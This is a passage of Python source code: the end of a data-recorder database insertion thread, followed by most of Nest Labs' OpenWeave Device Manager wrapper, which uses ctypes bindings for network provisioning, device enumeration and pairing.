def run(self):
"""运行插入线程"""
while self.active:
try:
dbName, collectionName, d = self.queue.get(block=True, timeout=1)
self.mainEngine.dbInsert(dbName, collectionName, d)
except Empty:
pass
#----------------------------------------------------------------------
def start(self):
"""启动"""
self.active = True
self.thread.start()
#----------------------------------------------------------------------
def stop(self):
"""退出"""
if self.active:
self.active = False
self.thread.join()
#----------------------------------------------------------------------
def writeDrLog(self, content):
"""快速发出日志事件"""
log = VtLogData()
log.logContent = content
event = Event(type_=EVENT_DATARECORDER_LOG)
event.dict_['data'] = log
self.eventEngine.put(event)
|
WeaveDeviceMgr.py
|
#
# Copyright (c) 2013-2017 Nest Labs, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# @file
# Python interface for Weave Device Manager
#
"""Weave Device Manager interface
"""
from __future__ import absolute_import
from __future__ import print_function
import functools
import sys
import os
import re
import copy
import binascii
import datetime
import time
import glob
import platform
from threading import Thread, Lock, Event
from ctypes import *
import six
from six.moves import range
__all__ = [ 'WeaveDeviceManager', 'NetworkInfo', 'DeviceManagerException', 'DeviceError', 'DeviceManagerError' ]
NetworkType_WiFi = 1
NetworkType_Thread = 2
WiFiMode_AdHoc = 1
WiFiMode_Managed = 2
WiFiRole_Station = 1
WiFiRole_AccessPoint = 2
WiFiSecurityType_None = 1
WiFiSecurityType_WEP = 2
WiFiSecurityType_WPAPersonal = 3
WiFiSecurityType_WPA2Personal = 4
WiFiSecurityType_WPA2MixedPersonal = 5
WiFiSecurityType_WPAEnterprise = 6
WiFiSecurityType_WPA2Enterprise = 7
WiFiSecurityType_WPA2MixedEnterprise = 8
ThreadPANId_NotSpecified = 0xFFFFFFFF
ThreadChannel_NotSpecified = 0xFF
RendezvousMode_EnableWiFiRendezvousNetwork = 0x0001
RendezvousMode_Enable802154RendezvousNetwork = 0x0002
RendezvousMode_EnableFabricRendezvousAddress = 0x0004
TargetFabricId_AnyFabric = 0xFFFFFFFFFFFFFFFF
TargetFabricId_NotInFabric = 0
TargetDeviceMode_Any = 0x00000000 # Locate all devices regardless of mode.
TargetDeviceMode_UserSelectedMode = 0x00000001 # Locate all devices in 'user-selected' mode -- i.e. where the device has
# has been directly identified by a user, e.g. by pressing a button.
TargetVendorId_Any = 0xFFFF
TargetProductId_Any = 0xFFFF
TargetDeviceId_Any = 0xFFFFFFFFFFFFFFFF
DeviceFeature_HomeAlarmLinkCapable = 0x00000001 # Indicates a Nest Protect that supports connection to a home alarm panel
DeviceFeature_LinePowered = 0x00000002 # Indicates a device that requires line power
SystemTest_ProductList = { 'thermostat' : 0x235A000A,
'topaz' : 0x235A0003}
DeviceDescriptorFlag_IsRendezvousWiFiESSIDSuffix = 0x01
def _VoidPtrToByteArray(ptr, len):
if ptr:
v = bytearray(len)
memmove((c_byte * len).from_buffer(v), ptr, len)
return v
else:
return None
def _ByteArrayToVoidPtr(array):
if array != None:
if not (isinstance(array, str) or isinstance(array, bytearray)):
raise TypeError("Array must be an str or a bytearray")
return cast( (c_byte * len(array)) .from_buffer_copy(array), c_void_p)
else:
return c_void_p(0)
def _CStringToString(s):
return None if s is None else s.decode()
def _StringToCString(s):
return None if s is None else s.encode()
def _IsByteArrayAllZeros(array):
for i in range(len(array)):
if (array[i] != 0):
return False
return True
def _ByteArrayToHex(array):
return binascii.hexlify(bytes(array)).decode()
WeaveDeviceMgrDLLBaseName = '_WeaveDeviceMgr.so'
def _AllDirsToRoot(dir):
dir = os.path.abspath(dir)
while True:
yield dir
parent = os.path.dirname(dir)
if parent == '' or parent == dir:
break
dir = parent
def _LocateWeaveDLL():
scriptDir = os.path.dirname(os.path.abspath(__file__))
# When properly installed in the weave package, the Weave Device Manager DLL will
# be located in the package root directory, along side the package's
# modules.
dmDLLPath = os.path.join(scriptDir, WeaveDeviceMgrDLLBaseName)
if os.path.exists(dmDLLPath):
return dmDLLPath
# For the convenience of developers, search the list of parent paths relative to the
# running script looking for an OpenWeave build directory containing the Weave Device
# Manager DLL. This makes it possible to import and use the WeaveDeviceMgr module
# directly from a built copy of the OpenWeave source tree.
buildMachineGlob = '%s-*-%s*' % (platform.machine(), platform.system().lower())
relDMDLLPathGlob = os.path.join('build', buildMachineGlob, 'src/device-manager/python/.libs', WeaveDeviceMgrDLLBaseName)
for dir in _AllDirsToRoot(scriptDir):
dmDLLPathGlob = os.path.join(dir, relDMDLLPathGlob)
for dmDLLPath in glob.glob(dmDLLPathGlob):
if os.path.exists(dmDLLPath):
return dmDLLPath
raise Exception("Unable to locate Weave Device Manager DLL (%s); expected location: %s" % (WeaveDeviceMgrDLLBaseName, scriptDir))
class NetworkInfo:
def __init__(self, networkType=None, networkId=None, wifiSSID=None, wifiMode=None, wifiRole=None,
wifiSecurityType=None, wifiKey=None,
threadNetworkName=None, threadExtendedPANId=None, threadNetworkKey=None, threadPSKc=None,
wirelessSignalStrength=None, threadPANId=None, threadChannel=None):
self.NetworkType = networkType
self.NetworkId = networkId
self.WiFiSSID = wifiSSID
self.WiFiMode = wifiMode
self.WiFiRole = wifiRole
self.WiFiSecurityType = wifiSecurityType
self.WiFiKey = wifiKey
self.ThreadNetworkName = threadNetworkName
self.ThreadExtendedPANId = threadExtendedPANId
self.ThreadNetworkKey = threadNetworkKey
self.ThreadPSKc = threadPSKc
self.ThreadPANId = threadPANId
self.ThreadChannel = threadChannel
self.WirelessSignalStrength = wirelessSignalStrength
def Print(self, prefix=""):
print("%sNetwork Type: %s" % (prefix, NetworkTypeToString(self.NetworkType)))
if self.NetworkId != None:
print("%sNetwork Id: %d" % (prefix, self.NetworkId))
if self.WiFiSSID != None:
print("%sWiFi SSID: \"%s\"" % (prefix, self.WiFiSSID))
if self.WiFiMode != None:
print("%sWiFi Mode: %s" % (prefix, WiFiModeToString(self.WiFiMode)))
if self.WiFiRole != None:
print("%sWiFi Role: %s" % (prefix, WiFiRoleToString(self.WiFiRole)))
if self.WiFiSecurityType != None:
print("%sWiFi Security Type: %s" % (prefix, WiFiSecurityTypeToString(self.WiFiSecurityType)))
if self.WiFiKey != None:
print("%sWiFi Key: %s" % (prefix, self.WiFiKey))
if self.ThreadNetworkName != None:
print("%sThread Network Name: \"%s\"" % (prefix, self.ThreadNetworkName))
if self.ThreadExtendedPANId != None:
print("%sThread Extended PAN Id: %s" % (prefix, _ByteArrayToHex(self.ThreadExtendedPANId)))
if self.ThreadNetworkKey != None:
print("%sThread Network Key: %s" % (prefix, _ByteArrayToHex(self.ThreadNetworkKey)))
if self.ThreadPSKc != None:
print("%sThread Network PSKc: %s" % (prefix, _ByteArrayToHex(self.ThreadPSKc)))
if self.ThreadPANId != None:
print("%sThread PAN Id: %04x" % (prefix, self.ThreadPANId))
if self.ThreadChannel != None:
print("%sThread Channel: %d" % (prefix, self.ThreadChannel))
if self.WirelessSignalStrength != None:
print("%sWireless Signal Strength: %s" % (prefix, self.WirelessSignalStrength))
def SetField(self, name, val):
name = name.lower();
if (name == 'networktype' or name == 'network-type' or name == 'type'):
self.NetworkType = ParseNetworkType(val)
elif (name == 'networkid' or name == 'network-id' or name == 'id'):
self.NetworkId = int(val)
elif (name == 'wifissid' or name == 'wifi-ssid' or name == 'ssid'):
self.WiFiSSID = val
elif (name == 'wifimode' or name == 'wifi-mode'):
self.WiFiMode = ParseWiFiMode(val)
elif (name == 'wifirole' or name == 'wifi-role'):
self.WiFiRole = ParseWiFiRole(val)
elif (name == 'wifisecuritytype' or name == 'wifi-security-type' or name == 'securitytype' or name == 'security-type' or name == 'wifi-security' or name == 'security'):
self.WiFiSecurityType = ParseSecurityType(val)
elif (name == 'wifikey' or name == 'wifi-key' or name == 'key'):
self.WiFiKey = val
elif (name == 'threadnetworkname' or name == 'thread-network-name' or name == 'thread-name'):
self.ThreadNetworkName = val
elif (name == 'threadextendedpanid' or name == 'thread-extended-pan-id'):
self.ThreadExtendedPANId = val
elif (name == 'threadnetworkkey' or name == 'thread-network-key' or name == 'thread-key'):
self.ThreadNetworkKey = val
elif (name == 'threadpskc' or name == 'thread-pskc' or name == 'pskc'):
self.ThreadPSKc = val
elif (name == 'threadpanid' or name == 'thread-pan-id' or name == 'pan-id'):
self.ThreadPANId = val
elif (name == 'threadchannel' or name == 'thread-channel'):
self.ThreadChannel = val
elif (name == 'wirelesssignalstrength' or name == 'wireless-signal-strength'):
self.WirelessSignalStrength = val
else:
raise Exception("Invalid NetworkInfo field: " + str(name))
class DeviceDescriptor:
def __init__(self, deviceId=None, fabricId=None, vendorId=None, productId=None, productRevision=None,
manufacturingYear=None, manufacturingMonth=None, manufacturingDay=None,
primary802154MACAddress=None, primaryWiFiMACAddress=None,
serialNumber=None, softwareVersion=None, rendezvousWiFiESSID=None, pairingCode=None,
pairingCompatibilityVersionMajor=None, pairingCompatibilityVersionMinor=None,
deviceFeatures=None, flags=None):
self.DeviceId = deviceId
self.FabricId = fabricId
self.VendorId = vendorId
self.ProductId = productId
self.ProductRevision = productRevision
self.ManufacturingYear = manufacturingYear
self.ManufacturingMonth = manufacturingMonth
self.ManufacturingDay = manufacturingDay
self.Primary802154MACAddress = primary802154MACAddress
self.PrimaryWiFiMACAddress = primaryWiFiMACAddress
self.SerialNumber = serialNumber
self.SoftwareVersion = softwareVersion
self.RendezvousWiFiESSID = rendezvousWiFiESSID
self.PairingCode = pairingCode
self.PairingCompatibilityVersionMajor = pairingCompatibilityVersionMajor
self.PairingCompatibilityVersionMinor = pairingCompatibilityVersionMinor
self.DeviceFeatures = [ ]
if deviceFeatures != None:
featureVal = 1
while featureVal != 0x80000000:
if (deviceFeatures & featureVal) == featureVal:
self.DeviceFeatures.append(featureVal)
featureVal <<= 1
self.Flags = flags if flags != None else 0
def Print(self, prefix=""):
if self.DeviceId != None:
print("%sDevice Id: %016X" % (prefix, self.DeviceId))
if self.FabricId != None:
print("%sFabrid Id: %016X" % (prefix, self.FabricId))
if self.VendorId != None:
print("%sVendor Id: %X" % (prefix, self.VendorId))
if self.ProductId != None:
print("%sProduct Id: %X" % (prefix, self.ProductId))
if self.ProductRevision != None:
print("%sProduct Revision: %X" % (prefix, self.ProductRevision))
if self.SerialNumber != None:
print("%sSerial Number: %s" % (prefix, self.SerialNumber))
if self.SoftwareVersion != None:
print("%sSoftware Version: %s" % (prefix, self.SoftwareVersion))
if self.ManufacturingYear != None and self.ManufacturingMonth != None:
if self.ManufacturingDay != None:
print("%sManufacturing Date: %04d/%02d/%02d" % (prefix, self.ManufacturingYear, self.ManufacturingMonth, self.ManufacturingDay))
else:
print("%sManufacturing Date: %04d/%02d" % (prefix, self.ManufacturingYear, self.ManufacturingMonth))
if self.Primary802154MACAddress != None:
print("%sPrimary 802.15.4 MAC Address: %s" % (prefix, _ByteArrayToHex(self.Primary802154MACAddress)))
if self.PrimaryWiFiMACAddress != None:
print("%sPrimary WiFi MAC Address: %s" % (prefix, _ByteArrayToHex(self.PrimaryWiFiMACAddress)))
if self.RendezvousWiFiESSID != None:
print("%sRendezvous WiFi ESSID%s: %s" % (prefix, " Suffix" if self.IsRendezvousWiFiESSIDSuffix else "", self.RendezvousWiFiESSID))
if self.PairingCode != None:
print("%sPairing Code: %s" % (prefix, self.PairingCode))
if self.PairingCompatibilityVersionMajor != None:
print("%sPairing Compatibility Major Id: %X" % (prefix, self.PairingCompatibilityVersionMajor))
if self.PairingCompatibilityVersionMinor != None:
print("%sPairing Compatibility Minor Id: %X" % (prefix, self.PairingCompatibilityVersionMinor))
if self.DeviceFeatures != None:
print("%sDevice Features: %s" % (prefix, " ".join([DeviceFeatureToString(val) for val in self.DeviceFeatures])))
@property
def IsRendezvousWiFiESSIDSuffix(self):
return (self.Flags & DeviceDescriptorFlag_IsRendezvousWiFiESSIDSuffix) != 0
class DeviceManagerException(Exception):
pass
class DeviceManagerError(DeviceManagerException):
def __init__(self, err, msg=None):
self.err = err
if msg != None:
self.msg = msg
else:
self.msg = "Device Manager Error %ld" % (err)
def __str__(self):
return self.msg
class DeviceError(DeviceManagerException):
def __init__(self, profileId, statusCode, systemErrorCode, msg=None):
self.profileId = profileId
self.statusCode = statusCode
self.systemErrorCode = systemErrorCode
if (msg == None):
if (systemErrorCode):
return "[ %08X:%d ] (system err %d)" % (profileId, statusCode, systemErrorCode)
else:
return "[ %08X:%d ]" % (profileId, statusCode)
self.message = msg
def __str__(self):
return "Device Error: " + self.message
class _DeviceStatusStruct(Structure):
_fields_ = [
("ProfileId", c_uint32),
("StatusCode", c_uint16),
("SysErrorCode", c_uint32)
]
class _IdentifyDeviceCriteriaStruct(Structure):
_fields_ = [
("TargetFabricId", c_uint64),
("TargetModes", c_uint32),
("TargetVendorId", c_uint16),
("TargetProductId", c_uint16),
("TargetDeviceId", c_uint64)
]
class _NetworkInfoStruct(Structure):
_fields_ = [
('NetworkType', c_int32), # The type of network.
('NetworkId', c_int64), # network id assigned to the network by the device, -1 if not specified.
('WiFiSSID', c_char_p), # The WiFi SSID.
('WiFiMode', c_int32), # The operating mode of the WiFi network.
('WiFiRole', c_int32), # The role played by the device on the WiFi network.
('WiFiSecurityType', c_int32), # The WiFi security type.
('WiFiKey', c_void_p), # The WiFi key, or NULL if not specified.
('WiFiKeyLen', c_uint32), # The length in bytes of the WiFi key.
('ThreadNetworkName', c_char_p), # The name of the Thread network.
('ThreadExtendedPANId', c_void_p), # The Thread extended PAN id (8 bytes).
('ThreadNetworkKey', c_void_p), # The Thread master network key.
('ThreadPSKc', c_void_p), # The Thread pre-shared key for commissioner
('ThreadPANId', c_uint32), # The 16-bit Thread PAN ID, or kThreadPANId_NotSpecified
('ThreadChannel', c_uint8), # The current channel on which the Thread network operates, or kThreadChannel_NotSpecified
('WirelessSignalStrength', c_int16),# The signal strength of the network, or INT16_MIN if not available/applicable.
('Hidden', c_bool) # Whether or not the network is hidden.
]
def toNetworkInfo(self):
return NetworkInfo(
networkType = self.NetworkType if self.NetworkType != -1 else None,
networkId = self.NetworkId if self.NetworkId != -1 else None,
wifiSSID = _CStringToString(self.WiFiSSID),
wifiMode = self.WiFiMode if self.WiFiMode != -1 else None,
wifiRole = self.WiFiRole if self.WiFiRole != -1 else None,
wifiSecurityType = self.WiFiSecurityType if self.WiFiSecurityType != -1 else None,
wifiKey = _VoidPtrToByteArray(self.WiFiKey, self.WiFiKeyLen),
threadNetworkName = _CStringToString(self.ThreadNetworkName),
threadExtendedPANId = _VoidPtrToByteArray(self.ThreadExtendedPANId, 8),
threadNetworkKey = _VoidPtrToByteArray(self.ThreadNetworkKey, 16),
threadPSKc = _VoidPtrToByteArray(self.ThreadPSKc, 16),
threadPANId = self.ThreadPANId if self.ThreadPANId != ThreadPANId_NotSpecified else None,
threadChannel = self.ThreadChannel if self.ThreadChannel != ThreadChannel_NotSpecified else None,
wirelessSignalStrength = self.WirelessSignalStrength if self.WirelessSignalStrength != -32768 else None
)
@classmethod
def fromNetworkInfo(cls, networkInfo):
networkInfoStruct = cls()
networkInfoStruct.NetworkType = networkInfo.NetworkType if networkInfo.NetworkType != None else -1
networkInfoStruct.NetworkId = networkInfo.NetworkId if networkInfo.NetworkId != None else -1
networkInfoStruct.WiFiSSID = _StringToCString(networkInfo.WiFiSSID)
networkInfoStruct.WiFiMode = networkInfo.WiFiMode if networkInfo.WiFiMode != None else -1
networkInfoStruct.WiFiRole = networkInfo.WiFiRole if networkInfo.WiFiRole != None else -1
networkInfoStruct.WiFiSecurityType = networkInfo.WiFiSecurityType if networkInfo.WiFiSecurityType != None else -1
networkInfoStruct.WiFiKey = _ByteArrayToVoidPtr(networkInfo.WiFiKey)
networkInfoStruct.WiFiKeyLen = len(networkInfo.WiFiKey) if (networkInfo.WiFiKey != None) else 0
networkInfoStruct.ThreadNetworkName = _StringToCString(networkInfo.ThreadNetworkName)
networkInfoStruct.ThreadExtendedPANId = _ByteArrayToVoidPtr(networkInfo.ThreadExtendedPANId)
networkInfoStruct.ThreadNetworkKey = _ByteArrayToVoidPtr(networkInfo.ThreadNetworkKey)
networkInfoStruct.ThreadPSKc = _ByteArrayToVoidPtr(networkInfo.ThreadPSKc)
networkInfoStruct.ThreadPANId = networkInfo.ThreadPANId if networkInfo.ThreadPANId != None else ThreadPANId_NotSpecified
networkInfoStruct.ThreadChannel = networkInfo.ThreadChannel if networkInfo.ThreadChannel != None else ThreadChannel_NotSpecified
networkInfoStruct.WirelessSignalStrength = networkInfo.WirelessSignalStrength if networkInfo.WirelessSignalStrength != None else -32768
return networkInfoStruct
class _DeviceDescriptorStruct(Structure):
_fields_ = [
('DeviceId', c_uint64), # Weave device id (0 = not present)
('FabricId', c_uint64), # Id of Weave fabric to which the device belongs (0 = not present)
('DeviceFeatures', c_uint32), # Bit field indicating support for specific device features.
('VendorId', c_uint16), # Device vendor id (0 = not present)
('ProductId', c_uint16), # Device product id (0 = not present)
('ProductRevision', c_uint16), # Device product revision (0 = not present)
('ManufacturingYear', c_uint16), # Year of device manufacture (valid range 2001 - 2099, 0 = not present)
('ManufacturingMonth', c_ubyte), # Month of device manufacture (1 = January, 0 = not present)
('ManufacturingDay', c_ubyte), # Day of device manufacture (0 = not present)
('Primary802154MACAddress', c_ubyte * 8), # MAC address for primary 802.15.4 interface (big-endian, all zeros = not present)
('PrimaryWiFiMACAddress', c_ubyte * 6), # MAC address for primary WiFi interface (big-endian, all zeros = not present)
('SerialNumber', c_char * 33), # Serial number of device (nul terminated, 0 length = not present)
('SoftwareVersion', c_char * 33), # Version of software running on the device (nul terminated, 0 length = not present)
('RendezvousWiFiESSID', c_char * 33), # ESSID for pairing WiFi network (nul terminated, 0 length = not present)
('PairingCode', c_char * 17), # Device pairing code (nul terminated, 0 length = not present)
('PairingCompatibilityVersionMajor', c_uint16), # Pairing software compatibility major version
('PairingCompatibilityVersionMinor', c_uint16), # Pairing software compatibility minor version
('Flags', c_ubyte), # Flags
]
def toDeviceDescriptor(self):
return DeviceDescriptor(
deviceId = self.DeviceId if self.DeviceId != 0 else None,
fabricId = self.FabricId if self.FabricId != 0 else None,
vendorId = self.VendorId if self.VendorId != 0 else None,
productId = self.ProductId if self.ProductId != 0 else None,
productRevision = self.ProductRevision if self.ProductRevision != 0 else None,
manufacturingYear = self.ManufacturingYear if self.ManufacturingYear != 0 else None,
manufacturingMonth = self.ManufacturingMonth if self.ManufacturingMonth != 0 else None,
manufacturingDay = self.ManufacturingDay if self.ManufacturingDay != 0 else None,
primary802154MACAddress = bytearray(self.Primary802154MACAddress) if not _IsByteArrayAllZeros(self.Primary802154MACAddress) else None,
primaryWiFiMACAddress = bytearray(self.PrimaryWiFiMACAddress) if not _IsByteArrayAllZeros(self.PrimaryWiFiMACAddress) else None,
serialNumber = _CStringToString(self.SerialNumber) if len(self.SerialNumber) != 0 else None,
softwareVersion = _CStringToString(self.SoftwareVersion) if len(self.SoftwareVersion) != 0 else None,
rendezvousWiFiESSID = _CStringToString(self.RendezvousWiFiESSID) if len(self.RendezvousWiFiESSID) != 0 else None,
pairingCode = _CStringToString(self.PairingCode) if len(self.PairingCode) != 0 else None,
pairingCompatibilityVersionMajor = self.PairingCompatibilityVersionMajor,
pairingCompatibilityVersionMinor = self.PairingCompatibilityVersionMinor,
deviceFeatures = self.DeviceFeatures,
flags = self.Flags)
_dmLib = None
_CompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p)
_IdentifyDeviceCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p, POINTER(_DeviceDescriptorStruct))
_PairTokenCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_void_p, c_uint32)
_UnpairTokenCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p)
_NetworkScanCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_uint16, POINTER(_NetworkInfoStruct))
_AddNetworkCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_uint32)
_GetNetworksCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_uint16, POINTER(_NetworkInfoStruct))
_GetCameraAuthDataCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_char_p, c_char_p)
_GetRendezvousModeCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_uint16)
_GetFabricConfigCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_void_p, c_uint32)
_ErrorFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_ulong, POINTER(_DeviceStatusStruct))
_GetBleEventFunct = CFUNCTYPE(c_void_p)
_WriteBleCharacteristicFunct = CFUNCTYPE(c_bool, c_void_p, c_void_p, c_void_p, c_void_p, c_uint16)
_SubscribeBleCharacteristicFunct = CFUNCTYPE(c_bool, c_void_p, c_void_p, c_void_p, c_bool)
_CloseBleFunct = CFUNCTYPE(c_bool, c_void_p)
_DeviceEnumerationResponseFunct = CFUNCTYPE(None, c_void_p, POINTER(_DeviceDescriptorStruct), c_char_p)
# This is a fix for WEAV-429. Jay Logue recommends revisiting this at a later
# date to allow for truely multiple instances so this is temporary.
def _singleton(cls):
instance = [None]
def wrapper(*args, **kwargs):
if instance[0] is None:
instance[0] = cls(*args, **kwargs)
return instance[0]
return wrapper
@_singleton
class WeaveDeviceManager(object):
def __init__(self, startNetworkThread=True):
self.devMgr = None
self.callbackRes = None
self.networkThread = None
self.networkThreadRunable = False
self.networkLock = Lock()
self.completeEvent = Event()
self._InitLib()
devMgr = c_void_p(None)
res = _dmLib.nl_Weave_DeviceManager_NewDeviceManager(pointer(devMgr))
if (res != 0):
raise self._ErrorToException(res)
self.devMgr = devMgr
def HandleComplete(devMgr, reqState):
self.callbackRes = True
self.completeEvent.set()
def HandleError(devMgr, reqState, err, devStatusPtr):
self.callbackRes = self._ErrorToException(err, devStatusPtr)
self.completeEvent.set()
def HandleDeviceEnumerationResponse(devMgr, deviceDescPtr, deviceAddrStr):
print(" Enumerated device IP: %s" % (_CStringToString(deviceAddrStr)))
deviceDescPtr.contents.toDeviceDescriptor().Print(" ")
self.cbHandleComplete = _CompleteFunct(HandleComplete)
self.cbHandleError = _ErrorFunct(HandleError)
self.cbHandleDeviceEnumerationResponse = _DeviceEnumerationResponseFunct(HandleDeviceEnumerationResponse)
self.blockingCB = None # set by other modules(BLE) that require service by thread while thread blocks.
self.cbHandleBleEvent = None # set by other modules (BLE) that provide event callback to Weave.
self.cbHandleBleWriteChar = None
self.cbHandleBleSubscribeChar = None
self.cbHandleBleClose = None
if (startNetworkThread):
self.StartNetworkThread()
def __del__(self):
if (self.devMgr != None):
_dmLib.nl_Weave_DeviceManager_DeleteDeviceManager(self.devMgr)
self.StopNetworkThread()
def DriveBleIO(self):
# perform asynchronous write to pipe in IO thread's select() to wake for BLE input
res = _dmLib.nl_Weave_DeviceManager_WakeForBleIO()
if (res != 0):
raise self._ErrorToException(res)
def SetBleEventCB(self, bleEventCB):
if (self.devMgr != None):
self.cbHandleBleEvent = _GetBleEventFunct(bleEventCB)
_dmLib.nl_Weave_DeviceManager_SetBleEventCB(self.cbHandleBleEvent)
def SetBleWriteCharCB(self, bleWriteCharCB):
if (self.devMgr != None):
self.cbHandleBleWriteChar = _WriteBleCharacteristicFunct(bleWriteCharCB)
_dmLib.nl_Weave_DeviceManager_SetBleWriteCharacteristic(self.cbHandleBleWriteChar)
def SetBleSubscribeCharCB(self, bleSubscribeCharCB):
if (self.devMgr != None):
self.cbHandleBleSubscribeChar = _SubscribeBleCharacteristicFunct(bleSubscribeCharCB)
_dmLib.nl_Weave_DeviceManager_SetBleSubscribeCharacteristic(self.cbHandleBleSubscribeChar)
def SetBleCloseCB(self, bleCloseCB):
if (self.devMgr != None):
self.cbHandleBleClose = _CloseBleFunct(bleCloseCB)
_dmLib.nl_Weave_DeviceManager_SetBleClose(self.cbHandleBleClose)
def StartNetworkThread(self):
if (self.networkThread != None):
return
def RunNetworkThread():
while (self.networkThreadRunable):
self.networkLock.acquire()
_dmLib.nl_Weave_DeviceManager_DriveIO(50)
self.networkLock.release()
time.sleep(0.005)
self.networkThread = Thread(target=RunNetworkThread, name="WeaveNetworkThread")
self.networkThread.daemon = True
self.networkThreadRunable = True
self.networkThread.start()
def StopNetworkThread(self):
if (self.networkThread != None):
self.networkThreadRunable = False
self.networkThread.join()
self.networkThread = None
def IsConnected(self):
return self._CallDevMgr(
lambda: _dmLib.nl_Weave_DeviceManager_IsConnected(self.devMgr)
)
def DeviceId(self):
return self._CallDevMgr(
lambda: _dmLib.nl_Weave_DeviceManager_DeviceId(self.devMgr)
)
def DeviceAddress(self):
return self._CallDevMgr(
lambda: _CStringToString(_dmLib.nl_Weave_DeviceManager_DeviceAddress(self.devMgr))
)
def SetRendezvousAddress(self, addr, intf = None):
if addr is not None and "\x00" in addr:
raise ValueError("Unexpected NUL character in addr");
res = self._CallDevMgr(
lambda: _dmLib.nl_Weave_DeviceManager_SetRendezvousAddress(self.devMgr, _StringToCString(addr), _StringToCString(intf))
)
if (res != 0):
raise self._ErrorToException(res)
def SetConnectTimeout(self, timeoutMS):
if timeoutMS < 0 or timeoutMS > pow(2,32):
raise ValueError("timeoutMS must be an unsigned 32-bit integer")
res = self._CallDevMgr(
lambda: _dmLib.nl_Weave_DeviceManager_SetConnectTimeout(self.devMgr, timeoutMS)
)
if (res != 0):
raise self._ErrorToException(res)
def SetAutoReconnect(self, autoReconnect):
res = self._CallDevMgr(
lambda: _dmLib.nl_Weave_DeviceManager_SetAutoReconnect(self.devMgr, autoReconnect)
)
if (res != 0):
raise self._ErrorToException(res)
def SetRendezvousLinkLocal(self, RendezvousLinkLocal):
res = self._CallDevMgr(
lambda: _dmLib.nl_Weave_DeviceManager_SetRendezvousLinkLocal(self.devMgr, RendezvousLinkLocal)
)
if (res != 0):
raise self._ErrorToException(res)
def StartDeviceEnumeration(self, targetFabricId=TargetFabricId_AnyFabric,
targetModes=TargetDeviceMode_Any,
targetVendorId=TargetVendorId_Any,
targetProductId=TargetProductId_Any,
targetDeviceId=TargetDeviceId_Any):
deviceCriteria = _IdentifyDeviceCriteriaStruct()
deviceCriteria.TargetFabricId = targetFabricId
deviceCriteria.TargetModes = targetModes
deviceCriteria.TargetVendorId = targetVendorId
deviceCriteria.TargetProductId = targetProductId
deviceCriteria.TargetDeviceId = targetDeviceId
self._CallDevMgr(
lambda: _dmLib.nl_Weave_DeviceManager_StartDeviceEnumeration(self.devMgr, deviceCriteria, self.cbHandleDeviceEnumerationResponse, self.cbHandleError)
)
def StopDeviceEnumeration(self):
res = self._CallDevMgr(
lambda: _dmLib.nl_Weave_DeviceManager_StopDeviceEnumeration(self.devMgr)
)
def ConnectDevice(self, deviceId, deviceAddr=None,
pairingCode=None, accessToken=None):
if deviceAddr is not None and '\x00' in deviceAddr:
raise ValueError("Unexpected NUL character in deviceAddr")
if pairingCode is not None and '\x00' in pairingCode:
raise ValueError("Unexpected NUL character in pairingCode")
if (pairingCode != None and accessToken != None):
raise ValueError('Must specify only one of pairingCode or accessToken when calling WeaveDeviceManager.ConnectDevice')
if (pairingCode == None and accessToken == None):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_ConnectDevice_NoAuth(self.devMgr, deviceId, _StringToCString(deviceAddr), self.cbHandleComplete, self.cbHandleError)
)
elif (pairingCode != None):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_ConnectDevice_PairingCode(self.devMgr, deviceId, _StringToCString(deviceAddr), _StringToCString(pairingCode), self.cbHandleComplete, self.cbHandleError)
)
else:
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_ConnectDevice_AccessToken(self.devMgr, deviceId, _StringToCString(deviceAddr), _ByteArrayToVoidPtr(accessToken), len(accessToken), self.cbHandleComplete, self.cbHandleError)
)
def RendezvousDevice(self, pairingCode=None, accessToken=None,
targetFabricId=TargetFabricId_AnyFabric,
targetModes=TargetDeviceMode_Any,
targetVendorId=TargetVendorId_Any,
targetProductId=TargetProductId_Any,
targetDeviceId=TargetDeviceId_Any):
if pairingCode is not None and '\x00' in pairingCode:
raise ValueError("Unexpected NUL character in pairingCode")
if (pairingCode != None and accessToken != None):
raise ValueError('Must specify only one of pairingCode or accessToken when calling WeaveDeviceManager.RendezvousDevice')
deviceCriteria = _IdentifyDeviceCriteriaStruct()
deviceCriteria.TargetFabricId = targetFabricId
deviceCriteria.TargetModes = targetModes
deviceCriteria.TargetVendorId = targetVendorId
deviceCriteria.TargetProductId = targetProductId
deviceCriteria.TargetDeviceId = targetDeviceId
if (pairingCode == None and accessToken == None):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_RendezvousDevice_NoAuth(self.devMgr, deviceCriteria, self.cbHandleComplete, self.cbHandleError)
)
elif (pairingCode != None):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_RendezvousDevice_PairingCode(self.devMgr, _StringToCString(pairingCode), deviceCriteria, self.cbHandleComplete, self.cbHandleError)
)
else:
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_RendezvousDevice_AccessToken(self.devMgr, _ByteArrayToVoidPtr(accessToken), len(accessToken), deviceCriteria, self.cbHandleComplete, self.cbHandleError)
)
# methods for testing BLE performance are not a part of the Weave Device Manager API, but rather are considered internal.
def TestBle(self, connObj, count, duration, delay, ack, size, rx):
res = self._CallDevMgr(
lambda: _dmLib.nl_Weave_DeviceManager_TestBle(self.devMgr, connObj, self.cbHandleComplete, self.cbHandleError, count, duration, delay, ack, size, rx)
)
if (res != 0):
